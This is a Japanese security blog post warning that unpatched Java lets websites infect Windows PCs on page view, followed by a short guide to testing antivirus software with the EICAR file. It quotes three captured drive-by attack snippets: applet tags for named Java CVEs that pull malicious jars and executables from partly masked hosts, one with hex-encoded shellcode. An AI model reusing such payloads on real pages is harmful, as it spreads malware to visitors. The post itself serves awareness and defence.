ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫過去の投稿日別表示

全1ページ

[1]

イメージ 1

 サイトを単にブラウザで開いただけ(見ただけ!!)で強制的なウィルス感染被害にあってしまう脅威が確認されてますなー。普通何かしらのプログラムを使いたい場合、ユーザーが実行ファイルを手動でダウンロードしてきて、そのファイルを起動させて始めて利用できるわけですが、ソフトウェアの脆弱性を悪用すると、そういう処理をすっ飛ばして不正な処理の実行が実現されちゃうん。 :(
Java のバージョンが古いままだと・・・ 【Exploit Java Vulnerability】
 たとえば、米国Oracle(オラクル)によるJava(JRE)の脆弱性を悪用した攻撃例をいくつか挙げときましょう。Javaの悪用は、2010年あたりからウイルス攻撃者にチョー人気です。主要なブラウザ(Internet Explorer、Firefox、Chrome、Opera)上で動作するJavaを経由してWindowsパソコンを一発で陥落させることができます。

 まず、攻撃ページへブラウザを強制的に誘導させるコードを、ハッキングして乗っ取った一般の正規サイトなどに挿入します。他にもメールだったりTwitterだったりで攻撃ページへと誘導してもOK。攻撃ページには下のようなHTMLタグを用意しておきます。

タイプA (脆弱性識別番号:CVE-2010-0840
 「dfgfhjkhcfryjtdezsf.jar」ファイルにはJavaの脆弱性を攻撃する不正な処理が含まれていて、2行目のURLアドレスへアクセスすると落ちてくる実行ファイルを勝手にダウンロードしてきて強制的に起動する。
<applet code='folder.Globus.class' archive='http://***.cz.cc/dfgfhjkhcfryjtdezsf.jar'>
<param name='url' value='http://***.cz.cc/out.php?a=QQkEEkcJBQQEBAQG&p=1'/>
</applet>
タイプB (脆弱性識別番号:CVE-2010-0842
 「xoxo.jar」ファイルにはJavaの脆弱性を攻撃する不正な処理が含まれていて、数字の羅列(サウンドデータ)の中に含まれてるURLアドレスへアクセスすると落ちてくる実行ファイルを勝手にダウンロードしてきて強制的に起動する。
<applet archive="xoxo.jar" code="zap.class" width="100" height="100"><param name="pix" value="4952455a000000010000000200000065534f4e476d53cb6d00000000477fff00010000010100000004001c0008007f00000000000000000000000000000000000000000000000000000000000000015449544c9fb1b50d0a7efb709c86feb03593e25ede(〜中略〜)8e4e0eecff5504935033c05050568b550483c27f83c2315250b8361a2f70ff55045b33ff5756b898fe8a0eff550457b8efcee060ff5504687474703a2f2f636f6e7363696f7573646f6e75742e76762e63632f73686f777468726561642e7068703f743d313031363432"></applet>
タイプC (脆弱性識別番号:CVE-2010-4452
 「ftzxcvb(.class)」ファイルにはJavaの脆弱性を攻撃する不正な処理が含まれていて、4行目に指定されてるURLアドレスへアクセスすると落ちてくる実行ファイルを勝手にダウンロードしてきて強制的に起動する。
<applet>
<param name="code" value="http://***/ftzxcvb">
<param name="codebase" value="file:C:\Program Files\java\jre6\lib\ext">
<param name="foreground" value="http://***.cz.cc/out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=8">
</applet>
 これらは、すべてブラウザ内部で処理されるので、ユーザーは裏で起こってるトンでもない事態に気づきません。運よく気付くのは、強制的に実行させられてしまったウイルスそのものの動き・・・結局は後の祭りの状態ってことですな。 :(
ウイルス感染被害にあわない条件
1. そもそもJava(JRE)が導入されてない
 Javaが導入されてないと攻撃しようがないので影響ありません。ただ、一般的なメーカー製パソコンには購入時点であらかじめJavaがインストールされてる場合が多いです。トンでもなく危険なソフトがまさか自分のパソコンに導入されているとはつゆ知らず・・・なんてな状態の人がいるん。

2. Javaは導入されているが、脆弱性がすでに解消されてる最新版を導入してある
 タイプA/Bは「Java 6 Update 19」(2010年4月)、タイプCは「Java 6 Update 24」(2011年2月)にて不正な処理が機能しないよう問題の修正が行われてます。が、現実的には対処してないユーザーが多い結果としてJavaの悪用が人気なん。

3.環境がMac OS、Linux、携帯電話・スマートフォン、ゲーム機である
 影響があるのはWindowsパソコン(Windows XP/Vista/7)だけです。攻撃のターゲットは全Windowsユーザーになるん。

・ ウイルス感染被害をもたらす超危険なソフトウェア4種
・ Javaの更新作業の代行なぞしてくれないセキュリティソフト

ウイルス対策ソフト・セキュリティソフトがちゃんと動いてるか確認できるサイト

Windowsパソコンをターゲットとするマルウェア(ウイルス・トロイの木馬・スパイウェア・ワームなど)が蔓延してます。

現在のウイルス攻撃の目的は「お金儲け」「情報搾取」です。

なので、市場シェアがもっとも大きくユーザー数の多いWindowsパソコンが特に狙われてます。 :(

Windowsそのものにはウイルス検知機能がまったく備わってないので、ウイルス対策ソフト・セキュリティソフト・アンチウイルスソフトの導入が必須となってます。


ちゃんとソフトが可動してるか確認チェックできるサイト

導入してあるウイルス対策ソフトがはたしてちゃんとパソコンを護ってくれてるのか?

本物のウイルスをゲットしてきて確認する方法もなくはないですが、さすがに普通に落ちてるようなシロモノではないですし危険です。(^^;

そこで利用するのが「eicar.com」というファイルです。

コイツはこの世に存在するすべてのウイルス対策ソフトが”ウイルス”と(故意に)検出判定します。

EICAR(エイカー)というセキュリティ団体の公式サイトから誰でもダウンロード可能です。

実際にはウイルスではなく、あくまで動作検証用のテストファイルで、パソコンを破壊したり、情報を盗んだりするような危険は処理はなく無害なものです。 ;)

「eicar.com」をダウンロードする

まずはコチラのページにアクセスして一番下らへんにある表の左側の「eicar.com」のリンクをクリックしてみましょう。

ウイルス対策ソフトがちゃんと動いてれば、さっそくビビン(?)と反応して検出警告画面などを拝めるはずです。 :)

 イメージ 1

このテストウイルスをいったんデスクトップにダウンロードして保存したいならば、お隣のテキストファイル版「eicar.com.txt」をブラウザの右クリックメニューで[名前を付けて保存]します。

ウイルス対策ソフトによっては、これすらも過剰反応してしまう場合がありますが、デスクトップに置いたら、拡張子の「.txt」部分を削ってみてください。

ちなみに、ウイルスバスターを提供してるトレンドマイクロのサイトからでもまったく同じものが入手できます。


全1ページ

[1]

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1
2 3 4 5 6
7
8
9
10
11
12 13 14 15
16 17 18 19 20
21
22
23
24
25
26
27
28
29
30 31
検索 検索
友だち(5)
  • Cookies
  • who
  • 物知りマン
  • ★ピサロ★
  • Kerupani129
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

ふるさと納税サイト『さとふる』
実質2000円で特産品がお手元に
11/30までキャンペーン実施中!
数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!
お肉、魚介、お米、おせちまで
おすすめ特産品がランキングで選べる
ふるさと納税サイト『さとふる』

その他のキャンペーン

みんなの更新記事